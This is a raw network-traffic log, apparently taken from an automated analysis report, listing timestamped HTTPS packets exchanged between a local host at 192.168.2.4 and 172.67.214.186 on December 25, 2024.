                                                                                                                                          Dec 25, 2024 22:17:40.130564928 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.130604982 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.133898020 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.133912086 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.133969069 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.133976936 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.134021997 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.138039112 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.138051987 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.138097048 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.138104916 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.138137102 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.141501904 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.141515017 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.141566038 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.141575098 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.141618967 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.145421028 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.145433903 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.145488024 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.145495892 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.145546913 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.148832083 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.148845911 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.148916006 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.148926020 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.148969889 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.315536022 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.315551996 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.315606117 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.315617085 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.315658092 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.319003105 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.319017887 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.319082975 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.319091082 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.319138050 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.322330952 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.322345018 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.322388887 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.322398901 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.322437048 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.326608896 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.326623917 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.326661110 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.326668978 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.326700926 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.326723099 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.329966068 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.329981089 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.330023050 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.330032110 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.330070019 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.334217072 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.334232092 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.334274054 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.334283113 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.334352016 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.338123083 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.338138103 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.338181973 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.338188887 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.338216066 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.338232994 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.341654062 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.341669083 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.341717958 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.341727018 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.341774940 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.507955074 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.507976055 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.508018970 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.508029938 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.508063078 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.508074999 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.511295080 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.511311054 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.511387110 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.511398077 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.511415005 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.511442900 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.514724970 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.514739037 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.514789104 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.514797926 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.514842987 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.518964052 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.518978119 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.519027948 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.519037008 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.519088984 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.522336960 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.522351027 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.522393942 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.522403002 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.522432089 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.522442102 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.526948929 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.526962996 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.526999950 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.527009010 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.527035952 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.527057886 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.529978991 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.529994011 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.530040026 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.530047894 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.530101061 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.533943892 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.533958912 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.534002066 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.534009933 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.534030914 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.534058094 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.699796915 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.699814081 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.699866056 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.699877977 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.699898958 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.699918985 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.703178883 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.703192949 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.703238010 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.703248024 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.703275919 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.703288078 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.707425117 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.707438946 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.707483053 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.707492113 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.707531929 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.710783005 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.710798979 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.710875034 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.710884094 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.710921049 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.715064049 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.715079069 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.715133905 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.715143919 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.715188980 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.718442917 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.718458891 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.718518019 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.718528032 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.718569994 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.722608089 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.722623110 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.722671032 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.722678900 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.722700119 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.722722054 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.726692915 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.726707935 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.726746082 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.726753950 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.726797104 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.726815939 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.892164946 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.892188072 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.892271996 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.892285109 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.892324924 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.896241903 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.896260977 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.896306038 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.896313906 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.896342993 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.896363974 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.899657965 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.899676085 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.899715900 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.899724960 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.899739981 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.899800062 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.903089046 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.903107882 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.903177023 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.903186083 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.903229952 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.907026052 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.907046080 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.907085896 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.907094002 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.907129049 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.907144070 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.911148071 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.911165953 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.911231995 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.911241055 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.911286116 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.914617062 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.914638042 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.914673090 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.914680004 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.914706945 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.914721012 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.918792963 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.918812990 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.918858051 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.918865919 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:40.918895006 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:40.918904066 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.084163904 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.084192038 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.084261894 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.084275961 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.084290028 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.087807894 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.088294029 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.088313103 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.088363886 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.088371992 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.088413000 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.091800928 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.091820002 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.091857910 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.091866016 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.091893911 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.091907978 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.095980883 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.096000910 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.096054077 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.096061945 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.096103907 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.099303961 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.099344969 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.099385977 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.099394083 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.099425077 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.099436998 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.103430033 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.103446960 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.103518963 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.103527069 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.103570938 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.106897116 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.106914997 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.106986046 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.106993914 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.107038975 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.111058950 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.111082077 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.111150026 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.111157894 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.111201048 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.276917934 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.276936054 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.277029991 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.277043104 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.277090073 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.280359030 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.280374050 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.280442953 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.280452013 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.280494928 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.283751011 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.283766985 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.283806086 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.283813000 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.283843994 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.283854961 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.288055897 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.288073063 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.288113117 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.288120031 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.288151979 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.288172960 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.291393042 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.291409016 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.291475058 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.291488886 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.291531086 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.295635939 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.295650959 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.295717001 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.295726061 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.295766115 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.299007893 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.299022913 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.299091101 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.299098969 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.299140930 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.303195000 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.303209066 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.303270102 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.303278923 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.303333044 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.469053984 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.469072104 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.469149113 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.469180107 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.469233036 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.473239899 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.473256111 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.473321915 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.473331928 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.473391056 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.476658106 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.476675034 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.476727962 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.476737022 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.476782084 CET49744443192.168.2.4172.67.214.186
                                                                                                                                          Dec 25, 2024 22:17:41.480846882 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.480864048 CET44349744172.67.214.186192.168.2.4
                                                                                                                                          Dec 25, 2024 22:17:41.480926037 CET49744443192.168.2.4172.67.214.186
